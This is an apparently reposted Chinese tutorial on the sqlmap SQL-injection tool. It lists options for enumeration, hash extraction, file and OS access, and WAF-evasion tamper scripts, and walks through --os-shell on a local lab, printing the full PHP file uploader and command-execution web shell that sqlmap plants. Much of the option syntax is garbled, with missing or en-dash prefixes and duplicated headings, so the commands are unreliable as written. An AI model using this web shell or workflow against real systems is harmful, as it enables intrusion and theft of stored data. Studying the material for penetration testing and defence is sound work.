sqlmap使用总结

daily

原文作者: Ywc

原文链接: https://yinwc.github.io/2018/07/05/tooluse(sqlmap)/

发表日期: July 5th 2018, 1:20:40 pm

版权声明:

sqlmap使用总结

选项

–version 显示程序的版本号并退出
-h, –help 显示此帮助消息并退出
-v VERBOSE 详细级别:0-6(默认为1)

Target(目标)

以下至少需要设置其中一个选项,设置目标 URL。

1
2
3
4
5
6
-d DIRECT 直接连接到数据库。
-u URL, –url=URL 目标 URL。
-l LIST 从 Burp 或 WebScarab 代理的日志中解析目标。
-r REQUESTFILE 从一个文件中载入 HTTP 请求。
-g GOOGLEDORK 处理 Google dork 的结果作为目标 URL。
-c CONFIGFILE 从 INI 配置文件中加载选项。

Request(请求)

这些选项可以用来指定如何连接到目标URL。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
data=DATA 通过 POST 发送的数据字符串
cookie=COOKIE HTTP Cookie 头
–cookie-urlencode URL 编码生成的 cookie 注入
–drop-set-cookie 忽略响应的 Set –Cookie 头信息
user-agent=AGENT 指定 HTTP User –Agent 头
–random-agent 使用随机选定的 HTTP User-Agent 头
referer=REFERER 指定 HTTP Referer 头
headers=HEADERS 换行分开,加入其他的 HTTP 头
auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)
auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
proxy=PROXY 使用 HTTP 代理连接到目标 URL
proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
–ignore-proxy 忽略系统默认的 HTTP 代理
delay=DELAY 在每个 HTTP 请求之间的延迟时间,单位为秒
timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
retries=RETRIES 连接超时后重新连接的时间(默认3)
scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
safe-url=SAFURL 在测试过程中经常访问的 url 地址
safe-freq=SAFREQ 两次访问之间测试请求,给出安全的 URL

Optimization(优化)

这些选项可用于优化 sqlmap.py 的性能。

1
2
3
4
5
-o 开启所有优化开关
predict-output 预测常见的查询输出
keep-alive 使用持久的 HTTP(S) 连接
null-connection 从没有实际的 HTTP 响应体中检索页面长度
threads=THREADS 最大的 HTTP(S) 请求并发量(默认为1

Injection(注入)

这些选项可以用来指定测试哪些参数,提供自定义的注入 payloads 和可选篡改脚本。

1
2
3
4
5
6
7
8
-p TESTPARAMETER 可测试的参数
dbms=DBMS 强制后端的 DBMS 为此值
os=OS 强制后端的 DBMS 操作系统为这个值
prefix=PREFIX 注入 payload 字符串前缀
suffix=SUFFIX 注入 payload 字符串后缀
tamper=TAMPER 使用给定的脚本篡改注入数据
–tamper 通过编码绕过 WEB 防火墙(WAF)sqlmap.py 默认用 char()
–tamper 插件所在目录\sqlmap-dev\tamper

Detection(检测)

这些选项可以用来指定在 SQL 盲注时如何解析和比较 HTTP 响应页面的内容

1
2
3
4
5
level=LEVEL 执行测试的等级(1-5,默认为 1)
risk=RISK 执行测试的风险(0-3,默认为 1)
string=STRING 查询有效时在页面匹配字符串
regexp=REGEXP 查询有效时在页面匹配正则表达式
–text-only 仅基于文本内容比较网页

这些选项可用于调整具体的 SQL 注入测试

1
2
3
–technique=TECH SQL 注入技术测试(默认 BEUST)
Techniques(技巧):
–technique /*测试指定注入类型\使用的技术

不加参数默认测试所有注入技术:

不加参数默认测试所有注入技术:

1
2
3
4
5
B: 基于布尔的 SQL 盲注
E: 基于显错 sql 注入
U: 基于 UNION 注入
S: 叠层 sql 注入
T: 基于时间盲注
1
2
3
time-sec=TIMESEC DBMS 响应的延迟时间(默认为 5 秒)
union-cols=UCOLS 定列范围用于测试 UNION 查询注入
union-char=UCHAR 用于暴力猜解列数的字符

Fingerprint(指纹)

1
-f, –fingerprint 执行检查广泛的 DBMS 版本指纹

Enumeration(枚举)

这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己的 SQL 语句。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
-b, –banner 检索数据库管理系统的标识
current-user 检索数据库管理系统当前用户
current-db 检索数据库管理系统当前数据库
is-dba 检测 DBMS 当前用户是否 DBA
–users 枚举数据库管理系统用户
–passwords 枚举数据库管理系统用户密码哈希
privileges 枚举数据库管理系统用户的权限
–roles 枚举数据库管理系统用户的角色
–dbs 枚举数据库管理系统数据库
tables 枚举 DBMS 数据库中的表
columns 枚举 DBMS 数据库表列
–dump 转储数据库管理系统的数据库中的表项
–dump-all 转储所有的 DBMS 数据库表中的条目
search 搜索列,表和/或数据库名称
-D DB 要进行枚举的数据库名
-T TBL 要进行枚举的数据库表
-C COL 要进行枚举的数据库列
-U USER 用来进行枚举的数据库用户
exclude-sysdbs 枚举表时排除系统数据库
–start=LIMITSTART 第一个查询输出进入检索
–stop=LIMITSTOP 最后查询的输出进入检索
–first=FIRSTCHAR 第一个查询输出字的字符检索
–last=LASTCHAR 最后查询的输出字字符检索
sql-query=QUERY 要执行的 SQL 语句
sql-shell 提示交互式 SQL 的 shell

Brute force(蛮力)

这些选项可以被用来运行蛮力检查。

1
2
common-tables 检查存在共同表
common-columns 检查存在共同列

User-defined function injection(用户自定义函数注入)

这些选项可以用来创建用户自定义函数。

User-defined function injection(用户自定义函数注入):
这些选项可以用来创建用户自定义函数。

1
2
–udf-inject 注入用户自定义函数
shared-lib=SHLIB 共享库的本地路径

File system access(访问文件系统)

这些选项可以被用来访问后端数据库管理系统的底层文件系统。

File system access(访问文件系统):
这些选项可以被用来访问后端数据库管理系统的底层文件系统。

1
2
3
file-read=RFILE 从后端的数据库管理系统文件系统读取文件
file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

[*]Operating system access(操作系统访问)

这些选项可以用于访问后端数据库管理系统的底层操作系统。

1
2
3
4
5
6
7
8
os-cmd=OSCMD 执行操作系统命令
os-shell 交互式的操作系统的 shell
os-pwn 获取一个 OOB shell,meterpreter 或 VNC
os-smbrelay 一键获取一个 OOB shell,meterpreter 或 VNC
os-bof 存储过程缓冲区溢出利用
–priv-esc 数据库进程用户权限提升
–msf-path=MSFPATH Metasploit Framework 本地的安装路径
–tmp-path=TMPPATH 远程临时文件目录的绝对路径

-os-shell的使用

https://xz.aliyun.com/t/7942

https://blog.csdn.net/qq_61237064/article/details/124154956

1
2
3
4
5
使用前提

拥有网站的写入权限

Secure_file_priv参数为空或者为指定路径

满足条件后

1.注入

先对注入点探测

1
sqlmap -u http://127.0.0.1/sqli-lab/less-1/?id=1"

image-20221112150328026

然后执行--os-shell

1
sqlmap -u http://127.0.0.1/sqli-lab/less-1/?id=1" --os-shell

image-20221112150107492

选择php语言

image-20221112151004965

接着这个参数是选择绝对路径

image-20221112151019786

1
2
3
4
5
6
7
选项一为用这几个路径

选项二为用户自己输入

选项三为用用户的字典

选项四为爆破。

我们满足前提的话,选择2,直接输入自己知道的路径

image-20221112151155258

到这就完成了--os-shell的执行,来看看在sqlmap的执行效果

对于上传的两个文件tmpugvzq.phptmpbylqf.php我们在数据包中就可以看到,只需要解码就可以得到内容

tmpugvzq.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
0x<?php
if (isset($_REQUEST["upload"])){
	$dir=$_REQUEST["uploadDir"];
	if (phpversion()<'4.1.0')
		{
			$file=$HTTP_POST_FILES["file"]["name"];
			@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
		}
		else{
			$file=$_FILES["file"]["name"];
			@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
		}
		@chmod($dir."/".$file,0755);
		echo "File uploaded";
	}
	else 
		{
			echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=C:\\Users\\zhang\\Desktop\\php\\PHPTutorial\\WWW\\sqli-master\\Less-1\\> <input type=submit name=upload value=upload></form>";
		}
?>

根据上面的mysql语句,不难看出这是利用into outfile写入文件

tmpbylqf.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<?php 
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set("max_execution_time",0);
$z=@ini_get("disable_functions");
if(!empty($z))
    {
        $z=preg_replace("/[, ]+/",',',$z);
        $z=explode(',',$z);
        $z=array_map("trim",$z);
    }
else
    {
        $z=array();
    }
    $c=$c." 2>&1\n";
function f($n)
{
    global $z;return is_callable($n)and!in_array($n,$z);
}
if(f("system")){
    ob_start();
    system($c);
    $w=ob_get_clean();
}
elseif(f("proc_open")){
    $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
        $w.=fread($t[1],512);
    }
    @proc_close($y);
}
elseif(f("shell_exec")){
    $w=shell_exec($c);
}
elseif(f("passthru")){
    ob_start();
    passthru($c);
    $w=ob_get_clean();
}
elseif(f("popen")){
    $x=popen($c,r);
    $w=NULL;
    if(is_resource($x)){
        while(!feof($x))
            {
                $w.=fread($x,512);
            }
        }
        @pclose($x);
    }
    elseif(f("exec")){
        $w=array();
        exec($c,$w);
        $w=join(chr(10),$w).chr(10);
    }
    else{
        $w=0;
    }
    echo"<pre>$w</pre>";?>

这是一个用于命令执行的代码,命令执行后会将执行的结果输出。

直接在网站访问这两个shell文件就可以看到了

一个提供了一个上传文件的入口,一个提供了一个以cmd参数的命令执行窗口

1
2
3
4
成功后会在网站绝对路径下,生成两个文件,一个可以上传,一个可以执行命令。

tmpugvzq.php是可以上传
tmpbylqf.php是可以执行命令

【如果没看到,可以查看wireshark或者先bp抓包数据流并时刻开启监听】

这个时候sqlmap主要做了三件事情:

1
2
3
1、进行目标的一个基础信息的探测。
2、上传shell到目标web网站上。
3、退出时删除shell

2.Database

数据库支持外连,通过Sqlmap执行--os-shell获取shell

必要条件:

1
2
3
数据库支持外连

数据库权限为SA权限

Mysqlsqlsever两者的情况不同,详细建议看文章学习

Windows 注册表访问

这些选项可以被用来访问后端数据库管理系统Windows 注册表。

1
2
3
4
5
6
7
–reg-read 读一个Windows 注册表项值
–reg-add 写一个Windows 注册表项值数据
–reg-del 删除Windows 注册表键值
reg-key=REGKEY Windows 注册表键
reg-value=REGVAL Windows 注册表项值
reg-data=REGDATA Windows 注册表键值数据
reg-type=REGTYPE Windows 注册表项值类型

General(一般)

这些选项可以用来设置一些一般的工作参数。

1
2
3
4
5
6
7
8
-t TRAFFICFILE 记录所有 HTTP 流量到一个文本文件中
-s SESSIONFILE 保存和恢复检索会话文件的所有数据
flush-session 刷新当前目标的会话文件
–fresh-queries 忽略在会话文件中存储的查询结果
–eta 显示每个输出的预计到达时间
–update 更新 SqlMap
save file 保存选项到 INI 配置文件
–batch 从不询问用户输入,使用所有默认配置。

Miscellaneous(杂项

1
2
3
4
5
6
7
8
9
10
–beep 发现 SQL 注入时提醒
–check-payload IDS 对注入 payloads 的检测测试
–cleanup sqlmap.py 具体的 UDF 和表清理 DBMS
–forms 对目标 URL 的解析和测试形式
–gpage=GOOGLEPAGE 从指定的页码使用谷歌 dork 结果
–page-rank Google dork 结果显示网页排名(PR)
parse-errors 从响应页面解析数据库管理系统的错误消息
–replicate 复制转储的数据到一个 sqlite3 数据库
–tor 使用默认的 Tor(Vidalia/ Privoxy/ Polipo)代理地址
–wizard 给初级用户的简单向导界面

制定测试的种类

1
2
3
technique=TECH SQL注入技术测试(默认 BEUST)
Techniques(技巧):
–technique 测试指定注入类型使用的技术

不加参数默认测试所有注入技术:

1
2
3
4
5
B: 基于布尔的 SQL 盲注
E: 基于显错 sql 注入
U: 基于 UNION 注入
S: 叠层 sql 注入
T: 基于时间盲注

sqlmap 判断waf

1
sqlmap -u "http://www.test.com/" --identify-waf --batch

一般注入流程

以mysql为例

1.验证注入

1
sqlmap -u “注入点URL

从中可以发现存在注入的类型,数据库类型和web应用程序PHP和Apache等版本信息。

2.列举数据库名

1
2
sqlmap -u "注入点" --dbs
sqlmap -u "注入点" --current-db  #列举当前使用的数据库

3.查询某一数据库的所有表名

1
sqlmap -u "注入点" -D 数据库名 --tables

4.列举这一数据库的表的所有列(字段)

1
sqlmap -u "注入点" -D 数据库名 -T 表名 --columns

5.暴字段内容

1
sqlmap -u "注入点" -D 数据库名 -T 表名 -C "要爆的字段名" --dump

爆一个字段的话可能会很慢或者出错,全部暴出最好。

可以在后面加个 –batch 可以不用手动选择yes或no的选项。

sqlmap tamper 的使用

可以进行各种绕过防火墙和waf

1
--tamper xxx.py  (.py可以不加)

eg:python sqlmap.py -u “” – tamper base64encode.py
1.普通的tamper搭配方式:

1
2
3
4
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,
charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,
nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,
space2randomblank,unionalltounion,unmagicquotes

2.数据库为MSSQL的搭配方式:

1
2
3
4
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,
nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,
space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,
unmagicquotes

3.数据库为Mysql的搭配方式:

1
2
3
4
5
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,
greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,
multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,
space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,
versionedkeywords,versionedmorekeywords,xforwardedfor

4.常用脚本用法:

apostrophemask.py UTF-8编码
apostrophenullencode.py unicode编码
appendnullbyte.py 添加%00
base64encode.py base64编码
between.py 以”not between”替换”>“
bluecoat.py 以随机的空白字符替代空格,以”like”替代”=“
chardoubleencode.py 双重url编码
charencode.py url编码
charunicodeencode.py 对未进行url编码的字符进行unicode编码
equaltolike.py 以”like”替代”=“
halfversionedmorekeywords.py在每个关键字前添加条件注释
ifnull2ifisnull.py 以”IF(ISNULL(A), B, A)”替换”IFNULL(A, B)”
modsecurityversioned.py 条件注释
modsecurityzeroversioned.py 条件注释,0000
multiplespaces.py 添加多个空格
nonrecursivereplacement.py 可以绕过对关键字删除的防注入(这个我也不知道怎么说好,看例子。。。)
percentage.py 在每个字符前添加百分号(%)
randomcase.py 随即大小写
randomcomments.py 随机插入区块注释
sp_password.py 语句结尾添加”sp_password”迷惑数据库日志(很。。。)
space2comment.py 以区块注释替换空格
space2dash.py 以单行注释”–”和随机的新行替换空格
space2hash.py 以单行注释”#”和由随机字符组成的新行替换空格
space2morehash.py 没看出来和上面那个有什么区别。。
space2mssqlblank.py 以随机空白字符替换空格
space2mssqlhash.py 以单行注释”#”和新行替换空格
space2mysqlblank.py 以随机空白字符替换空格
space2mysqldash.py 以单行注释和新行替换空格
space2plus.py 以”+”替换空格
space2randomblank.py 随机空白字符替换空格
unionalltounion.py 以”union all”替换”union”
unmagicquotes.py 以”%bf%27”替换单引号,并在结尾添加注释”–”
versionedkeywords.py 对不是函数的关键字条件注释
versionedmorekeywords.py 对关键字条件注释